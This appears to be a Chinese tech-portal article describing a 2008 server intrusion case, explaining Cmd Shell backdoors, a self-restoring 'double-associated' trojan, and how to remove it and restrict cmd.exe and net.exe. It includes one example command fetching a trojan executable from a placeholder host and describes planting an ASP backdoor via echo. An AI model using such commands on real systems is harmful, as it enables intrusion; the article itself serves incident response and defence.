扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
★本文可以学到
1.什么是Cmd shell?是如何被黑客利用的?
2.如何清除双关联木马?
★必备知识
1.什么是Shell?
Shell的中文意思为“壳”,它管理着用户与操作系统之间的交互,可以把它理解为一个命令解释器。它接收用户命令,然后调用相关的应用程序来执行。
2.什么又是Cmd Shell?
Cmd Shell在这里可以称做系统后门,是黑客利用溢出或其他手段,获取目标计算机命令行的远程控制的权利。(Cmd即:用户在运行中输入“cmd”出现的命令行:如图1)
Cmd Shell
3.Cmd Shell是如何被黑客获取的?
Cmd Shell大多是当用户计算机存在漏洞时,黑客利用攻击工具进行远程进攻,导致计算机崩溃,从而丢失系统的控制权限(即Cmd Shell)。
4.什么是双关联木马?
木马在运行后生成两套完全相同的程序(名称和大小不一定一样),文中的“wlloginproxy.exe”程序(图2)和“services.exe”程序会互相扫描(每0.1秒扫描一次),如果发现对方没有启动或者运行时错误,其中一个木马程序会将自身复制,从新制造一个新的木马运行,导致用户无法完全删除。
木马在运行后生成两套完全相同的程序
【略突出】案例
时间:2008年2月18日
负责工程师:孙佳兴(老孙)
地点:青岛园林建设科技有限责任公司
现场:公司3D园林规划数据服务器被入侵。黑客采用底层入侵技术,绕过了防火墙和杀毒软件,对服务器数据进行了远程植入木马,并窃取了大量高价值产品信息。
【略突出】分析案例
听完了青岛园林建设科技有限责任公司管理员的描述后,工程师老孙详细看了公司的服务器配置:
服务器配置:主服务器为Window2003 SP1操作系统(补丁已经更新至2月11日最新微软安全公告提示)
安装组件:IIS6.0(WEB网页服务)
MS SQL2003(数据库)
ISAServer2004(微软的企业级防火墙)
Prowinde1.7.41(条件限制类杀毒软件)
然后,他基本确认了黑客的攻击手段,做出如下分析:
服务器采用企业版杀毒软件和入侵防火墙,限制了administrators和低级权限的运行文件的权利。黑客留下的痕迹证明:他采用的是溢出式攻击,并获取了高于administrators的权限。
小知识
什么是溢出式攻击?
溢出是黑客利用操作系统的漏洞,专门开发一种程序,加上相应的参数运行后,就可以得到你电脑具有管理员资格的控制权,等于你的电脑就是他的了。
【略突出】攻!
听完工程师老孙的分析后,公司网络管理员非常迷惑,到底黑客如何利用Cmd Shell下的远程控制进行传输,并进行后门植入的呢?
【加细框】下段可以学到:黑客实现远程传输的两种方法
老孙分析着残留的文件,基本推测出了黑客的攻击方式:
第一种方法:利用Echo命令写ASP后门。
小知识
Echo命令小解
主要功能:简单点说就是开启或关闭批处理命令行在屏幕上的显示,属于内部命令。内部命令就是常驻于内存的命令,在任意路径下输入均可执行。
目的:一是避免不需要的命令显示来干扰屏幕;二是在屏幕上给用户显示提示信息。
此方法原理:由于目标主机上已经安装了IIS服务,黑客在拥有Cmd Shell的情况下,利用Echo命令制造一个允许传输的ASP后门木马,来管理被入侵的计算机。
第二种方法:利用Cmd Shell结合网页进行远程传输。
由于黑客在入侵完成后删除了大部分日志,老孙推测还有另外一种方法也可以实现入侵:利用“开始→运行”,输入“cmd”打开命令提示符,输入“start”命令,将木马自动下载到网页缓存中。
例如:start itshttp://www.xxx.com/hack/ps.exe
在远程Shell中执行上面这个命令后,“ps.exe”已经下载到目标主机的网页缓存目录中了。然后继续通过Cmd命令获得“ps.exe”的具体位置。
小提示
对于以服务为启动方式的后门所提供的Shell,其用户身份一般都是System。
由于黑客在入侵时候会启动一个IE进程,如果是System身份的Shell,就不会在本地出现窗口,(这种情况符合黑客的入侵行为,避开了防火墙的权限限制)。
【略突出】防!
入侵分析结束了,接下来就是要解决黑客留下的后门木马。由于木马采用了双关联保护结构,为了清理后门并避免以后再出现类似入侵,老孙还特意做了一份详细的解决方案。
【加细框】下段可以学到:双关联木马为什么难以清除
黑客在入侵后种植的后门木马程序运行后会生成三个文件,分别是:
C:/WINDOWS/wlloginproxy.exe
C:/WINDOWS/Explore32.exe
C:/WINDOWS/system/services.exe(图3)
伪装进程
这三个文件用的都是HTM文件图标,千万不要以为它们是HTM文件!如果你的系统设置为显示所有文件的扩展名,看看图4,你会发现它们都还有个“.exe”的尾巴,这说明它们是可执行文件!
扩展名里有猫腻
这三个文件又分别起什么作用呢?“wlloginproxy.exe”文件用来在启动时加载运行,它是守护进程!
小知识
守护进程:
对木马来说,如果客户端向服务端的某一特定端口提出连接请求,服务端上的相应程序就会自动运行,来应答客户端的请求,我们称这个程序为守护进程。
“Explore32.exe”和“services.exe”是干什么的呢?呵呵,它们分别用来和HLP文件(帮助文件)、TXT文件(文本文件)关联,如果你发现并删除了“wlloginproxy.exe”,并不会真正清除了它。一旦打开帮助文件或文本文件,“Explore32.exe”和“services.exe”将被激活!它将再次生成守护进程“wlloginproxy.exe”。这就是服务器一旦被种植了双关联木马,就很难清除干净的原因!
【加细框】下段可以学到:双关联木马的清除方法
老孙的方案一:彻底清除双关联木马
1.删除文件
先删除C:/WINDOWS下的“wlloginproxy.exe”和“Explore32.exe”文件,再删除C:/WINDOWS/system下的“services.exe”文件。如果服务端已经运行,那么就得用进程管理软件找到“wlloginproxy.exe”这个进程,然后点击“终止”,再到C:/WINDOWS下将它删除。
网络大补贴
推荐两款进程管理软件:
(1).大而全:Windows进程管理器 v4.01,提供了700余种进程信息,以颜色分类。下载地址:http://down1.tech.sina.com.cn/download/downContent/2005-12-13/16432.shtml。
(2).小而精:Evonsoft Tool汉化绿色版,界面清爽,操作简单。下载地址:http://down1.tech.sina.com.cn/download/down_contents/1223740800/41185.shtml。
2.注册表中删除
点击“开始→运行”,输入“regedit”打开注册表,到注册表中来删除木马的自启动文件:
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"MainBroad BackManager"="C://WINDOWS//wlloginproxy.exe"
3.恢复TXT文件关联
先下载恢复文件关联的注册表文件(http://work.newhua.com/cfan/200807/恢复REG.rar下载),解压。双击“恢复txt.reg”,点击“确定”导入注册表,将TXT文件关联恢复。
4.恢复HLP文件关联
双击上步中解压出来的“恢复htp.reg”,点击“确定”即可。
下段可以学到:防止Cmd Shell权限丢失的方法
老孙的方案二:预防Cmd Shell权限的丢失
小提示
Cmd Shell的获取大多是利用溢出攻击实现的,经过手工设置可以对溢出攻击进行有效的防御。
1.对于Windows 2000/2003系统,打开C:\WINNT\System32(系统安装在C盘),找到“cmd.exe”,用右键选择“属性”项,在“安全”标签下修改“cmd.exe”的访问权限,只保留刚刚新建立的用户对“cmd.exe”的完全控制权限,将其他用户全部删除,尤其是Everyone。
之后,找到“net.exe”文件,按照上述方法进行设置。如果还发现了“net1.exe”,也要设置一样的权限。
2.在Windows XP下,“cmd.exe”的“属性”选项里已经没有了“安全”标签。可以点击“开始→运行”,输入“gpedit.msc”,打开“组策略”窗口。在组策略中,依次展开“计算机配置→Windows 设置→软件限制策略”,右击后,选择“创建新的策略”。然后,继续展开“软件限制策略→其他规则”项,右击该项,选择“新键散列规则”。在弹出窗口中点击“浏览”按钮,选择C:\WINNT\System32下的“cmd.exe”文件,设置“安全级别”为“不允许的”。
对“net.exe”文件执行同样的操作,进行限制,如图5。
图5 加以限制
总结
清除木马只是被攻击之后的应急解救措施,学会方案二中如何防止Cmd Shell权限的丢失,不给黑客留下后门,才能保证重要数据的安全性。
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者